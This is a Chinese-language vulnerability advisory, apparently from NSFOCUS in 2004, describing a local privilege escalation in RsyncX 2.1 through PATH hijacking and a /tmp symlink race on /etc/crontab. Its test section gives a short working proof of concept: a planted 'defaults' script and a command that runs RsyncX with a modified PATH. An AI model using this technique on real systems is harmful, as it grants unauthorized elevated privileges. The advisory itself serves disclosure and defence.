安全研究
安全漏洞
RsyncX本地权限提升漏洞
发布日期:2004-09-17
更新日期:2004-09-20
受影响系统:RsyncX RsyncX 2.1
描述:
BUGTRAQ ID:
11211
RsyncX是一款通过命令行和图形用户界面实现HFS+支持和配置的rsync实现。
RsyncX实现没有正确丢弃wheel权限,本地攻击者可以利用这个漏洞获得root用户权限。
RsyncX不正确丢弃'wheel'组权限,允许本地用户以wheel组权限执行任意程序。本地攻击者可以在用户路径中建立特殊的'defaults'文件,使得其内容以高特权属性执行。
另外定时组件不安全的使用临时文件('/tmp/cron_rsyncxtmp'),本地用户可以在文件系统中建立符号文件,控制'/etc/crontab'导致权限提升。
<*来源:Matt Johnston (
matt@ucc.asn.au)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=109543708829034&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
建立如下内容的~/bin/defaults文件:
=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================
然后在用户路径的~/bin中运行RsyncX :
PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX
建议:
厂商补丁:
RsyncX
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.macosxlabs.org/rsyncx/rsyncx.html浏览次数:2774
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |